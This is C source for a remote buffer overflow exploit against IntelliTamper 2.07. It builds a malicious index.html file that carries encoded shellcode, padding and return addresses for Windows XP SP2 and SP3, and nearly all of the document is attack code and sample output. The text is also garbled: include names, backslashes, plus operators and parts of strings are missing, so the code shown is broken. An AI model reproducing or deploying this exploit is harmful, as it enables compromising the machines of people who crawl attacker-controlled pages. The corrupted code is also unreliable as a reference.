* IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Expoit
*
* Discovered & Written by r0ut3r (writ3r [at] gmail.com)
* Many Thanks to Luigi Auriemma (http://aluigi.org)
*
* Greets to shinnai (http://www.shinnai.net)
* and Guido Landi
*
* IntelliTamper contains a remote buffer overflow vulnerability.
* The HTML parser, more precise the image tag fails to preform
* boundary checks on supplied data.
*
* kit:/home/r0ut3r/public_html/imgsrc-xpl # gcc -o yahh yahh.c
* kit:/home/r0ut3r/public_html/imgsrc-xpl # ./yahh 0
* [!] OS: Microsoft Windows XP Pro SP 2
* [ ] Building payload
* [ ] Inserting JMP code
* [ ] Success writing to index.html
* kit:/home/r0ut3r/public_html/imgsrc-xpl #
*/
#include
#include
#include
Encoder=PexFnstenvSub http://metasploit.com
Filtered characters: 0x00 0x22 0x09 0x0a 0x0d 0x3c 0x3e */
unsigned char shellcode[] =
"x31xc9x83xe9xd8xd9xeexd9x74x24xf4x5bx81x73x13x99"
"xebx8dx6ax83xebxfcxe2xf4x65x03xc9x6ax99xebx06x2f"
"xa5x60xf1x6fxe1xeax62xe1xd6xf3x06x35xb9xeax66x23"
"x12xdfx06x6bx77xdax4dxf3x35x6fx4dx1ex9ex2ax47x67"
"x98x29x66x9exa2xbfxa9x6execx0ex06x35xbdxeax66x0c"
"x12xe7xc6xe1xc6xf7x8cx81x12xf7x06x6bx72x62xd1x4e"
"x9dx28xbcxaaxfdx60xcdx5ax1cx2bxf5x66x12xabx81xe1"
"xe9xf7x20xe1xf1xe3x66x63x12x6bx3dx6ax99xebx06x02"
"xa5xb4xbcx9cxf9xbdx04x92x1ax2bxf6x3axf1x04x43x8a"
"xf9x83x15x94x13xe5xdax95x7ex88xb7x36xeex82xe3x0e"
"xf6x9cxfex36xeax92xfex1exfcx86xbex58xc5x88xecx06"
"xfaxc5xe8x12xfcxebx8dx6a"; #define JMP 0xe9 //JMP int main(int argc, char* argv[])
{
FILE *fd;
unsigned char buff[4000],
*jmpref,
*p;
int opt; struct
{
char *os;
unsigned int eip;
} targets[] =
{
"Microsoft Windows XP Pro SP 2",
0x7d040e1f, "Microsoft Windows XP Pro SP 3",
0x7c8369f0
}; if (argc < 2)
{
printf("---------------------------------------------------------n");
printf(" IntelliTamper 2.07 Remote Buffer Overflow Expoit nn"); printf(" Discovered & Written by r0ut3r (writ3r [at] gmail.com)n");
printf(" Thanks to Luigi Auriemma (http://aluigi.org)nn");
printf(" Usage: %s
printf(" 0: Microsoft Windows XP Pro SP2n");
printf(" 1: Microsoft Windows XP Pro SP3n");
printf("---------------------------------------------------------n");
return 1;
} p = buff; switch (atoi(argv[1]))
{
case 0:
opt = 0;
printf("[!] OS: %sn", targets[0].os);
break; case 1:
opt = 1;
printf("[!] OS: %sn", targets[1].os);
break;
} printf("[ ] Building payloadn");
p = sprintf(p, "
int a = 3065 - (p - jmpref);
for (i=0; i < a; i )
*p = 'A'; *(unsigned int *) p = targets[opt].eip;
p = 4; printf("[ ] Inserting JMP coden"); *p = JMP;
*(unsigned int *) p = jmpref - (p 4); //JMP -(3065 4 5)
p = 4; p = sprintf(p, "">"); fd = fopen("index.html", "wb");
if (fd == NULL)
{
perror("[-] Failed opening index.htmln");
return 1;
} fwrite(buff, 1, p - buff, fd);
if (fclose(fd) == 0)
printf("[ ] Success writing to index.htmln");
else
printf("[-] Failed writing to index.htmln"); return 0;
}
